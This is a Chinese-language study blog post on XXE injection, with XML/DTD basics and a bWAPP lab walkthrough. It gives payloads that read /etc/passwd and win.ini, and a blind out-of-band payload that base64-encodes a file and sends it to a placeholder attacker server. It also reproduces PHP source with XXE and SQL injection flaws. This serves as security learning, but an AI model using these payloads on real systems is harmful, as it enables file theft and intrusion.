XXE学习

学习XXE过程中的一些笔记，内容包括XXE的前置知识 XML、DTD等，以及bWapp中XXE的漏洞利用实验

前言

本来是想了解一下SSRF的，结果找到讲bWapp的SSRF的博客，里面有一个关于XXE的SSRF，索性就先把XXE看一下。
参考链接:

1. XXE前置知识
2. bWapp之XXE

XXE和XML、DTD

先分别说一下这三个词的概念吧

XXE

XXE全称XML External Entity Injection，也就是XML外部实体注入攻击，是对非安全的外部实体数据进行处理时引发的安全问题。要想搞懂XXE，肯定要先了解XML语法规则和外部实体的定义及调用形式。

DTD

DTD全称Document Type Definition 即文档类型定义，用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明)，也可以独立的放在一个文件中(外部引用)，由于其支持的数据类型有限，无法对元素或属性的内容进行详细规范，在可读性和可扩展性方面也比不上XML Schema。

XML

XML 指可扩展标记语言，被设计用来传输和存储数据。

学习链接

关于XML跟DTD的语法规则，我也是才看，还是不多说了，直接给教程链接吧。其中DTD的实体声明重点看
XML教程
DTD教程

---

基本Payload结构

<?xml version="1.0" encoding="UTF-8"?>  //xml声明
<!DOCTYPE miracle [             //DTD部分
    <!ELEMENT miracle ANY >       //元素类型声明
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>                       //实体声明里的外部实体声明
<miracle>&xee;</miracle>       //XML部分

---

DTD实体声明

上述Payload分析

稍微对linux有点了解的，看到上面的Payload结构中的DTD部分外部实体声明即<!ENTITY xxe SYSTEM "file:///etc/passwd">这一句就应该猜到这个Payload的作用了吧。
没错，这个Payload的作用是输出目标服务器(服务器若为Linux)的passwd文件。
那如果想用XXE漏洞进行一些别的操作，如:内网探测、内网入侵该怎么办呢？
那就要讲到DTD实体声明了。

实体声明又分为内部实体声明、外部实体声明、参数实体声明等。这里就只讲外部实体声明、参数实体声明吧

DTD外部实体声明

DTD外部实体声明语法:<!ENTITY 实体名称 SYSTEM "URI/URL">
引用方式: &实体名

外部引用可支持http，file等协议，不同的语言支持的协议不同，但存在一些通用的协议，具体内容如下图所示:

示例:

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

DTD参数实体声明

语法:<!ENTITY % 实体名称 "实体的值"> 或 <!ENTITY % 实体名称 SYSTEM "URI">
引用方式:%实体名
示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>

外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

---

XXE的利用方式-DTD

XXE作用

利用xxe漏洞可以进行拒绝服务攻击，文件读取，命令(代码)执行，SQL(XSS)注入，内外扫描端口，入侵内网站点等，内网探测和入侵是利用xxe中支持的协议http等进行内网主机和端口发现，可以理解是使用xxe进行SSRF的利用，基本上啥都能做了

XXE分类

一般xxe利用分为两大场景：有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为blind xxe，可以使用外带数据通道提取数据。

有回显情况

有回显的情况可以使用如下的两种方式进行XXE注入攻击，也就是上面讲到的DTD外部实体声明和参数实体声明。
方式一:

<!DOCTYPE foo 
[<!ELEMENT foo ANY >
<!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

方式二：

<!DOCTYPE foo 
[<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>

外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

无回显情况

可以使用外带数据通道提取数据，先使用php://filter获取目标文件的内容，然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。

<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php">
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xxx/evil.dtd">
%dtd;
%send;
]>

evil.dtd的内容，内部的%号要进行实体编码成&#x25。
注意此处的参数实体声明语法格式是:<!ENTITY % 实体名称 "值">

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx/?data=%file;'>"
>
%all;

这里执行完查看结果分两种情况:

1. 有报错
   有报错信息的话，直接查看错误信息有没有目标文件源码的base64
2. 没有报错
   没有报错的话，查看被发送机(自己的主机且具有公网IP)的访问日志。

---

还有bWapp中的xxe利用，待更···

---

2019/03/27 更

bWapp里的XXE实验

0x01 进入bWapp，选择XXE漏洞环境

1. 打开bWapp虚拟机,未安装参考BWAPP：一款非常好用的漏洞演示平台进行安装
2. 使用账户:bee 密码:bug进行登录，并选择安全级别为low
3. 登录后选择XXE漏洞环境,点击hack
   
4. 成功进入到XXE漏洞环境
   

0x02 抓包分析

1. 打开Burp，设置好浏览器代理，点击Any bugs?，查看抓包结果
   
2. 对抓包结果分析，如上图所划线处，可以看到xxe-1.php页面以POST方式向xxe-2.php提交xml数据

0x03 构造payloads

payload:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE miracle [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<reset>
<login>&xxe;</login>
<secret>Any Bugs?</secret>
</reset>

0x04 使用Burp repeater提交payloads

0x05 源码分析

1. 先放源码:

   <?php
   
   include("security.php");
   include("security_level_check.php");
   include("connect_i.php");
   
   $message = "";
   $body = file_get_contents("php://input");
   
   // If the security level is not MEDIUM or HIGH
   if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
   {
   
       ini_set("display_errors",1);
   
       $xml = simplexml_load_string($body);
   
       // Debugging
       // print_r($xml);
   
       $login = $xml->login;
       $secret = $xml->secret;
   
       if($login && $login != "" && $secret)
       {
   
           // $login = mysqli_real_escape_string($link, $login);
           // $secret = mysqli_real_escape_string($link, $secret);
           
           $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";
   
           // Debugging
           // echo $sql;      
   
           $recordset = $link->query($sql);
   
           if(!$recordset)
           {
   
               die("Connect Error: " . $link->error);
   
           }
   
           $message = $login . "'s secret has been reset!";
   
       }
   
       else
       {
   
           $message = "An error occured!";
   
       }
   
   }
   
   // If the security level is MEDIUM or HIGH
   else
   {
   
       // Disables XML external entities. Doesn't work with older PHP versions!
       // libxml_disable_entity_loader(true);
       $xml = simplexml_load_string($body);
       
       // Debugging
       // print_r($xml);
   
       $login = $_SESSION["login"];
       $secret = $xml->secret;
   
       if($secret)
       {
   
           $secret = mysqli_real_escape_string($link, $secret);
   
           $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";
   
           // Debugging
           // echo $sql;      
   
           $recordset = $link->query($sql);
   
           if(!$recordset)
           {
   
               die("Connect Error: " . $link->error);
   
           }
   
           $message = $login . "'s secret has been reset!";
   
       }
   
       else
       {
   
           $message = "An error occured!"; 
   
       }
   
   }
   
   echo $message;
   
   $link->close();
   
   ?>

2. 如下图,若安全级别为low的话，就从xml传输的数据中取出值来赋给login

3. login再拼接成message
   

4. message直接输出,所以存在XXE漏洞，利用login进行我们想要的操作并回显
   

5. 在源码中也能看到，对于中高级别，login从Session中获取，secret从xml获取后也用 mysqli_real_escape_string函数进行了特殊字符转义。

---

总结

本来还想写一下jarvis oj上一个xxe的例子，后面想想还是留到后面写刷jarvis题目的时候在写吧。XXE就学到这里吧(更深的现在也找不到例子学不来，2333，以后再深入吧)，过几天把SSRF简单学习总结一下。